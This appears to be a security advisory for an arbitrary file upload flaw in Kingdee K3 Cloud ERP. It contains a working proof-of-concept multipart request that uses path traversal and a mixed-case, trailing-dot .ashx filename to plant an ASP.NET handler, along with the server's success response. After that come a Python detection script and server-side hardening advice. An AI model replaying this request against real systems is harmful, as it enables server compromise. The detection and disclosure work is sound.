Vulnerability description
Kingdee K3 Cloud (金蝶云星空) is a cloud-based enterprise resource planning (ERP) product that gives enterprises an integrated solution covering financial management, supply chain management and business process management. In November 2023, intelligence about an arbitrary file upload vulnerability in Kingdee K3 Cloud was disclosed on the internet; an attacker can exploit this vulnerability to upload arbitrary files and gain control of the server.
POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 872
Content-Type: multipart/form-data; boundary=40b740aec07d704d4b1bfcbd39e74a57

--40b740aec07d704d4b1bfcbd39e74a57
Content-Disposition: form-data; name="dbId_v"

.
--40b740aec07d704d4b1bfcbd39e74a57
Content-Disposition: form-data; name="FID"

2022
--40b740aec07d704d4b1bfcbd39e74a57
Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/90c25edcf7876b866423957be777ee20.AsHx."
Content-Type: text/plain

<%@ WebHandler Language="C#" Class="TestHandler" %>
using System;
using System.Web;
public class TestHandler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType= "text/plain";
context.Response.Write("ea79db2085639bba76b3f64eeeccc7dc");
}
public bool IsReusable {
get {return false; }
}
}
--40b740aec07d704d4b1bfcbd39e74a57--

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Jul 2025 03:19:13 GMT
Content-Length: 60

{
"IsSuccess": true,
"Msg": "附件保存成功!"
}
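The request above shows the three things a defender should be able to recognise in traffic to this endpoint: a `../` sequence in the multipart `filename`, an ASP.NET handler extension written in mixed case, and a trailing dot (Windows drops trailing dots and spaces when it creates the file, so a naive "does it end in .ashx" check misses it). The following Python inspector, added here as an example and not part of the original advisory or of the vendor's product, parses a multipart/form-data body, normalises the filename the way Windows/IIS would, and reports those indicators. The handler path is taken from the request above; the set of executable extensions and the constructed sample requests (the PoC's handler source is replaced with placeholder text) are assumptions of this example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Assumption: upload endpoint to watch, taken from the request shown in the advisory.
WATCHED_PATHS = {"/k3cloud/srm/scpsupreghandler"}

# Assumption: extensions IIS/ASP.NET will execute if the stored file is later requested.
EXECUTABLE_EXTENSIONS = {".ashx", ".aspx", ".asmx", ".asp", ".ascx", ".asax", ".soap"}


@dataclass
class Part:
    name: str
    filename: Optional[str]
    data: bytes


def parse_multipart(content_type: str, body: bytes) -> list[Part]:
    """Minimal multipart/form-data splitter, sufficient for inspecting upload parts."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    delimiter = b"--" + m.group(1).encode("latin-1")
    parts: list[Part] = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        chunk = chunk.lstrip(b"\r\n")
        header_blob, _, data = chunk.partition(b"\r\n\r\n")
        disposition = ""
        for line in header_blob.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            if key.strip().lower() == "content-disposition":
                disposition = value.strip()
        # "(?:^|;\s*)" keeps the name= regex from matching inside filename=
        name = re.search(r'(?:^|;\s*)name="([^"]*)"', disposition)
        fname = re.search(r'filename="([^"]*)"', disposition)
        parts.append(Part(name=name.group(1) if name else "",
                          filename=fname.group(1) if fname else None,
                          data=data.rstrip(b"\r\n")))
    return parts


def filename_findings(filename: str) -> list[str]:
    """Reasons an uploaded filename looks hostile, after Windows-style normalisation
    (directory separators of both kinds, trailing dots/spaces dropped, case-insensitive)."""
    findings = []
    segments = filename.replace("\\", "/").split("/")
    if ".." in segments:
        findings.append("path traversal ('..' segment)")
    if len(segments) > 1:
        findings.append("directory component in filename")
    if filename != filename.rstrip(". "):
        findings.append("trailing dot/space (stripped by Windows, defeats naive extension check)")
    base = segments[-1].rstrip(". ")
    ext = ("." + base.rsplit(".", 1)[1].lower()) if "." in base else ""
    if ext in EXECUTABLE_EXTENSIONS:
        findings.append(f"server-executable extension {ext}")
    return findings


def inspect_upload(method: str, path: str, content_type: str, body: bytes) -> list[str]:
    """Return one alert string per indicator found in a POST to a watched endpoint."""
    if method.upper() != "POST" or path.lower() not in WATCHED_PATHS:
        return []
    if not content_type.lower().startswith("multipart/form-data"):
        return []
    alerts = []
    for part in parse_multipart(content_type, body):
        if part.filename is None:
            continue
        for reason in filename_findings(part.filename):
            alerts.append(f"part {part.name!r} filename {part.filename!r}: {reason}")
    return alerts


# ---- constructed sample requests (shape of the PoC, placeholder file contents) ----
BOUNDARY = "c0nstructedb0undary"
CT = f"multipart/form-data; boundary={BOUNDARY}"


def _build_body(filename: str, content: bytes) -> bytes:
    b = BOUNDARY.encode()
    lines = [
        b"--" + b, b'Content-Disposition: form-data; name="dbId_v"', b"", b".",
        b"--" + b, b'Content-Disposition: form-data; name="FID"', b"", b"2022",
        b"--" + b,
        b'Content-Disposition: form-data; name="FAtt"; filename="' + filename.encode() + b'"',
        b"Content-Type: application/octet-stream", b"", content,
        b"--" + b + b"--", b"",
    ]
    return b"\r\n".join(lines)


MALICIOUS = _build_body("../../../../uploadfiles/handler.AsHx.", b"<placeholder handler source>")
BENIGN = _build_body("supplier-license.pdf", b"%PDF-1.4 placeholder")

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, inspect_upload("POST", "/k3cloud/SRM/ScpSupRegHandler", CT, body))
```

The same normalisation belongs on the server side: an upload handler should take only the final path segment, strip trailing dots and spaces, compare the extension case-insensitively against an allowlist, and store the file under a server-generated name outside any directory IIS will execute from.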